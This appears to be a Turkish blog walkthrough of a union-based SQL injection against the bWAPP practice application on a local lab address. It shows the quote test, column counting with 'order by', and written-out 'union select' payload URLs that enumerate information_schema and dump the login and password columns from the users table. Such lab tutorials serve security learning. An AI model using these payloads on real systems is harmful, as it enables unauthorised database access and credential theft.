Araç çubuğuna " ' işaretlerini koyup bu yönde bir zafiyet var mı diye test ediyoruz.' koyduğumuzda syntax hatası aldık bu yönde bir zafiyetimiz olduğunu tespit etmiş olduk.İçerikte neler olduğunu görmek için metin kutumuz boşken arama yapıyorum.Filmler çıkıyor bu kısımla aslında çok bir işimiz yok.Şuan ilerliyeceğimiz yol için en azından yok.
Bu iki görselde aslında yaptığımız işlem oldukça basit kaç stün olduğunu bulmak için 'order by *-- - yazıyoruz. Buradaki "*" yazacağımız rakam. Deneme yanılma yolu ile bulacağız. ilk görselde 6 olarak denedim sonuç dönmedi daha sonra 7 olarak denedim yine bir sonuç alamadım.Son olarak 8 olarak denediğimde eror aldık demek ki 7 stünumuz var.8.yi eklediğimizde hata alıyoruz.
7 olarak bulmuştuk bu aklımızda o zaman yapmamız gereken. "union select 1,2,3,4,5,6,7-- - " burada bulunan sonuca göre değişkenlik gösterecektir.
Şimdi adım adım çözücez URL kısmına dikkat edelim.Görseller şeklinde adım adım göstereceğim.
table_name from information_schema.tables -- -
table_name from information_schema.tables where table_schema=database() -- -
192.168.1.40/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,group_concat(column_name),6,7 from information_schema.columns where table_name="users"-- -
192.168.1.40/bWAPP/sqli_1.php?title=1' union select 1,2,3,4,group_concat(login,password),6,7 from users-- -
Yorumlar
Yorum Gönder